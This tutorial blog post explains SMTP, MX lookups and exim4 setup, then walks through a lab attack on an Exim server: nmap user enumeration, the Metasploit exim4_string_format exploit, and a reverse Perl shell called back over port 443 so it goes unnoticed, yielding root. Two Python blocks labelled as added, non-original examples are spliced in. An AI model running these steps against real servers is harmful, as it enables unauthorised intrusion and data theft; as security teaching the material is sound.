Welcome back, my aspiring cyberwarriors!
In this series, Network Basics for Hackers, we explore the structure, operation and vulnerabilities of the major network protocols. In this way, the aspiring hacker/pentester/cyberwarrior will hopefully gain insight into not only each protocol's operation but also its vulnerabilities.
In this segment of this series, we will examine the Simple Mail Transport Protocol (SMTP), the protocol most of us could not live without!
What is SMTP?
Simple Mail Transport Protocol, or SMTP as it is commonly known, is among the most important protocols in our digital age. It is used to transfer email from one user to another. Although SMTP was first codified in 1983, it is still this same protocol, with some enhancements, that carries nearly all email today.
As the diagram above displays, the client Ana@maildomain-abc.com sends an email to the mail transfer agent (MTA) server via SMTP and retrieves email via either POP3 or IMAP. The same is true for the other client, Lav@maildomain-xyz.com. Communication between the email servers, or MTAs, is exclusively SMTP on port 25. POP3 uses port 110 and IMAP uses port 143.
The Email Processing Model
First, email is submitted by an email client, or mail user agent (MUA), such as Microsoft Outlook, Mozilla, etc. to the email server (mail submission agent, or MSA) using SMTP on port 587. This email is then transferred to the MTA. Most often, these two agents (MSA and MTA) are the same system managed by a single piece of software.
The boundary MTA uses DNS to look up the MX record of the recipient’s domain (see DNS). This record includes the name of the target MTA. We can demonstrate this with the dig command.
The MTA then selects the target host, connects to it and sends the message.
Once the server receives the incoming message, it hands it to a mail delivery agent (MDA) for delivery to the local recipient. Once the message is delivered to the local mail server, the email is stored for retrieval by an authenticated MUA.
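The MX lookup and "select the target host" step above, worked through in Python as an added example (not code from the original post): it parses a constructed `dig +short MX` output (invented host names, not a real lookup) and orders the candidate MTAs the way a sending MTA tries them, including the no-MX and null-MX edge cases.

```python
import re

# Constructed sample of `dig +short MX maildomain-xyz.com` output (invented hosts,
# not a real lookup). Each line is "<preference> <exchange>." as dig prints it.
DIG_SHORT_MX = """\
20 mx2.maildomain-xyz.com.
10 mx1.maildomain-xyz.com.
30 backup-mx.maildomain-xyz.com.
"""

MX_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s*$")


def parse_mx(dig_output):
    """Turn `dig +short MX` text into [(preference, host), ...] in the order printed.
    Trailing dots are stripped; anything that is not '<int> <host>' is ignored."""
    records = []
    for line in dig_output.splitlines():
        m = MX_LINE.match(line)
        if m:
            records.append((int(m.group(1)), m.group(2).rstrip(".").lower()))
    return records


def delivery_order(records, domain):
    """Order candidate MTAs the way a sending MTA tries them (RFC 5321 section 5.1):
    lowest preference first (sorted() is stable, so equal preferences keep input
    order; a real MTA may pick among them randomly). Two edge cases:
    - no MX records at all: the domain itself is the implicit MX (A/AAAA lookup);
    - a single null MX '0 .' (RFC 7505): the domain accepts no mail, so try nothing."""
    if not records:
        return [domain]
    if records == [(0, "")]:
        return []
    return [host for _, host in sorted(records, key=lambda rec: rec[0])]
```
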
Types of MTAs
There are multiple mail transfer agents used on various systems. In Linux, the major players are sendmail, Exim, and Postfix. On Microsoft operating systems, the major player is Microsoft's Exchange Server.
Packet-Level Analysis with Wireshark
When we capture packets going to an SMTP server, the capture looks something like the one below.
Note that in packets 1-3, an outside client is completing a TCP three-way handshake. In packet 4, the SMTP server identifies itself as "mail01", a Postfix server on Ubuntu, and begins using the SMTP protocol for communication. In packet 5, the client issues the EHLO command, initiating communication. In packet 8, the client identifies the email sender and in packet 10, the email receiver.
Setting Up an SMTP (EXIM4) Server in Linux
Let's now set up an SMTP server on our Kali Linux system. In this case, we'll install exim4, the most widely used email server on Linux systems.
We can download exim4 from the Kali repository.
kali > sudo apt install exim4
Next, we need to execute a configuration wizard that walks us through the configuration of the exim4 server.
kali > sudo dpkg-reconfigure exim4-config
This starts a configuration wizard that queries us for information to configure the email server.
The first question is the type of mail server. If you want to set up your server to send and receive email across the Internet, select the first choice.
Next, you need to provide a domain name that you own. In my case, I used www.hackers-arise.com.
Here, we need to provide a list of recipient domains or local domains. The default is Kali and I left that in place.
Next, we are asked about DNS lookups. If we want to minimize the number of DNS queries the server makes, select YES.
Next, select the domains to relay mail for. You can leave it blank.
Finally, we need to select whether to split the configuration file for exim4. Unsplit is more stable, while split makes it easier to make changes. I selected unsplit, or NO.
Now, we only need to start our exim4 server and our email server is activated and ready to send and receive email!
Vulnerabilities in SMTP
Last year was marked by major vulnerabilities found in Microsoft Exchange Server, exploited presumably by Chinese hackers. These vulnerabilities enabled the attackers to access the email records of many large corporations and institutions. The impact of this hack was so large and serious that the FBI was given authorization to patch Exchange Server systems throughout the US.
You can see the vulnerabilities below.
In addition, in 2020, Exim email servers had two severe vulnerabilities that allowed unauthorized access to email stored on those servers.
Recon and Hacking SMTP
Before attempting any exploit, the first step is to do proper reconnaissance. nmap is the tool of choice for port scanning. Let's scan our SMTP service to see what ports and services are running.
We can do a TCP scan on port 25 (the default SMTP port) with nmap and include the -A switch to attempt to determine the service running on that port, like so:
kali > nmap -sT -A 192.168.56.103 -p25
As you can see above, nmap found port 25 open and running Exim 4.68.
To determine any potential vulnerabilities on that SMTP server, we might use nmap scripts. To run all the nmap scripts for SMTP, we can use the --script=smtp-* option, where the wildcard (*) means run all the scripts in the smtp category.
kali > nmap --script=smtp-* 192.168.56.103 -p 25
As you can see above, the smtp nmap scripts were able to enumerate multiple users (these users can then be targeted with social engineering attacks) and find that the server is vulnerable to the CVE-2010-4344 and CVE-2010-4345 exploits.
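As an added example (not code from the original post, and not a real capture), a small Python parser over a constructed S:/C: SMTP transcript in RFC 5321 notation. It pulls out the same fields you read off the Wireshark packets earlier (banner, EHLO name, sender, accepted recipient) and counts the VRFY/EXPN and rejected-RCPT probes that an smtp-* user-enumeration run leaves behind, which is what a defender looks for in a capture or in the mail log. The client name scanner.example and the addresses are invented.

```python
import re

# Constructed S:/C: transcript (RFC 5321 notation), not a real capture: the first
# half mirrors the packets described above, the second half is user probing.
SESSION = """\
S: 220 mail01 ESMTP Postfix (Ubuntu)
C: EHLO scanner.example
S: 250 mail01
C: MAIL FROM:<ana@maildomain-abc.com>
S: 250 2.1.0 Ok
C: RCPT TO:<lav@maildomain-xyz.com>
S: 250 2.1.5 Ok
C: VRFY root
S: 252 2.0.0 root
C: VRFY admin
S: 550 5.1.1 <admin>: Recipient address rejected: User unknown
C: RCPT TO:<nosuchuser@maildomain-xyz.com>
S: 550 5.1.1 <nosuchuser@maildomain-xyz.com>: Recipient address rejected
"""


def parse_session(text):
    """Return (summary, indicators): banner/EHLO/sender/accepted recipients, plus
    VRFY, EXPN and 550-rejected RCPT counts, the trace an enumeration scan leaves."""
    summary = {"banner": None, "ehlo": None, "mail_from": None, "rcpt_to": []}
    ind = {"vrfy": 0, "expn": 0, "rcpt_rejected": 0}
    cmd = arg = None
    for line in text.splitlines():
        side, _, body = line.partition(": ")
        if side == "C":
            verb, _, rest = body.partition(" ")
            cmd = verb.upper()
            m = re.search(r"<([^>]*)>", rest)
            arg = m.group(1) if m else rest.strip()  # address for MAIL/RCPT, else text
            if cmd == "EHLO":
                summary["ehlo"] = arg
            elif cmd in ("VRFY", "EXPN"):
                ind[cmd.lower()] += 1
        elif side == "S":
            code = body[:3]
            if summary["banner"] is None and code == "220":
                summary["banner"] = body[4:]
            elif cmd == "MAIL" and code.startswith("2"):
                summary["mail_from"] = arg
            elif cmd == "RCPT" and code.startswith("2"):
                summary["rcpt_to"].append(arg)
            elif cmd == "RCPT" and code == "550":
                ind["rcpt_rejected"] += 1
    # Arbitrary constructed threshold: three or more probes in one session is a flag.
    ind["enumeration"] = ind["vrfy"] + ind["expn"] + ind["rcpt_rejected"] >= 3
    return summary, ind
```

Note that the 252 reply to VRFY root is the response a server gives when it declines to confirm the user, so only 250 replies and accepted RCPTs actually confirm an account.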
Next, let’s see whether we can find these exploits in Metasploit. Fire up Metasploit by entering;
kali > msfconsole
Now, let's search for Exim exploits by using the search function.
msf5 > search type:exploits exim
As you can see in the screenshot above, Metasploit has multiple Exim exploits. Let’s try the exploit/unix/smtp/exim4_string_format exploit.
First, let's load the exploit using the use command.
msf5 > use exploit/unix/smtp/exim4_string_format
Before we progress further, let's learn more about this exploit by entering "info".
msf5 > info
As you can see above, this module exploits a heap buffer overflow. In addition, if it detects a Perl interpreter, it will automatically escalate privileges from a regular user to root.
Then, let’s set the RHOSTS parameter with the target system’s IP address. With the RHOSTS set, next set the PAYLOAD. In this case, let’s use cmd/unix/reverse_perl. This payload will open a command shell on the target machine using Perl (most Unix like systems have Perl installed by default) that will call back to our attack system if successful.
Lastly, we need only to set the LHOST and the LPORT. Let's set LPORT to 443 so that it uses a commonly open port, the one for HTTPS traffic. Often, by using this port, the connection back to us will go unnoticed.
The only step left is to run the exploit.
msf5 > exploit
As you can see above, the exploit worked and gave us a command shell in session 1!
Unlike when we exploit a Windows system, when we grab a command shell on Linux systems, we do not get a command prompt but rather an empty line. To test whether we are actually on the Linux SMTP server, we can enter Linux commands and check for the response. In this case, let’s run a few common Linux commands such as id, whoami, pwd, uname -a.
As you can see above, the system responds by informing us that the user is uid=0, or root, the present working directory is /var/spool/exim4 and the uname is Linux mailserver01.
Summary
Email service or Simple Mail Transport Protocol (SMTP) is one of the most critical services in our digital age. It is also one of the most highly targeted services as it contains confidential and key information. It is critical that this service be properly configured to prevent unauthorized access to this crucial data source.